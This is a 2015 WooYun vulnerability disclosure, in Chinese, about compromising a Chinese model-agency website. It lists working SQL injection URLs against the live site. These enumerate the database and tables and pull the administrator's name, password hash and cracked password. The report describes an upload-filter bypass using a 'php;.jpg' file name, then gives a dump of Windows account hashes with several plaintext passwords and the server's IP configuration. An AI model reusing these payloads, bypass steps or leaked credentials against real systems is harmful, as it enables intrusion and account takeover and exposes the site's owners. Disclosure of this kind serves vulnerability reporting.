漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0119997
漏洞标题:中国模特网sql注入到服务器权限
相关厂商:中国模特网
漏洞作者: 路人甲
提交时间:2015-06-12 15:51
修复时间:2015-07-27 15:52
公开时间:2015-07-27 15:52
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-06-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-27: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
上去就看见已经是被搞过了
详细说明:
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select @@version) or '1'='1-b,-1,-1,-1,-1,-1,-1
user()
@@version
db_name()
@@servername
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 1=(select is_srvrolemember('db_owner')
and 1=(select is_srvrolemember('public')
爆数据库:
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select name from master.dbo.sysdatabases where dbid=1) or '1'='1-b,-1,-1,-1,-1,-1,-1
当前数据库:
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select db_name()) or '1'='1-b,-1,-1,-1,-1,-1,-1
------> chinaeve
报表:
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select top 1 table_name from information_schema.tables where table_name not in(select top 1 table_name from information_schema.tables)) or '1'='1-b,-1,-1,-1,-1,-1,-1
tb_productType
tb_purchase
tb_Schedul
img
tb_Member
tb_Model_Data
tb_CompanyAccount1
tb_CompanyAccount
tb_Sysadmin
爆字段:
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select top 1 column_name from information_schema.columns where table_name='tb_Sysadmin' and column_name not in(select top 0 column_name from information_schema.columns where table_name='tb_Sysadmin' order by column_name) order by column_name) or '1'='1-b,-1,-1,-1,-1,-1,-1
爆账号密码
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select top 1 adminpwd from tb_sysadmin where adminname='admin' order by SysadminID ) or '1'='1-b,-1,-1,-1,-1,-1,-1
http://www.chinaeve.com/ModelList.aspx?url=,,4,-1,-1,-1,a' or 0=(select top 1 adminname from tb_sysadmin order by SysadminID) or '1'='1-b,-1,-1,-1,-1,-1,-1
admin
94F233EA56EF21D9D740CC9768426935909EDED6 :zaochenxinglai
进管理员后台,新闻管理 上传图片 传asp;.jpg 失效,传php;.jpg 成功
漏洞证明:
sql注入:
服务器:
--------------------------------------------- BEGIN DUMP --------------------------------------------
$ling:1016:400C37CBEF065246AAD3B435B51404EE:C019ED4B76D3C0977F9C7DC3DF4D92CD::: ling00
temp32:1015:D8FF1608057CBEDE87C394D748EF4541:F1073D2E4FBDC3EE1AB101B0719B2D1C:::
ASPNET:1007:0F2D1070F42921E425BD5221A9F890FF:DDEE1B75ECDFF6AE1436A5CB8A919F5F:::
jimmytang:1006:7FC4B6C8DA62B8F338F6DFE44B86ABD2:93705785F93C7C479706DC236F1701A3::: jimmy@2013
IWAM_CHINABTTE:1004:E4A8F92A9A0BD42966BC99C4F93A3B6B:32C9D47775A26FAB70DBF218AD7F88D7:::
IUSR_CHINABTTE:1003:0E638D4613747EBC90B8329CAC31C7A8:1715EB5F6C63425060D0AE04FA69846F:::
SUPPORT_388945a0:1001:AAD3B435B51404EEAAD3B435B51404EE:885B21C3D352F3D4C0C864A8A9A43E59:::
y)9z$5!7c:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
Administrator:500:2305D83F431CA9EB758FC8024D28E81B:3DAE2DB48E76E834441F1702DC08F521::: chuanmei20E
---------------------------------------------- END DUMP ---------------------------------------------
Connection-specific DNS Suffix . : |
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection |
Physical Address. . . . . . . . . : 00-50-56-A2-62-7F |
DHCP Enabled. . . . . . . . . . . : No |
IP Address. . . . . . . . . . . . : 118.244.173.12 |
Subnet Mask . . . . . . . . . . . : 255.255.224.0 |
Default Gateway . . . . . . . . . : 118.244.160.1 |
DNS Servers . . . . . . . . . . . : 211.147.6.3 |
8.8.8.8 |
NetBIOS over Tcpip. . . . . . . . : Disabled |
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝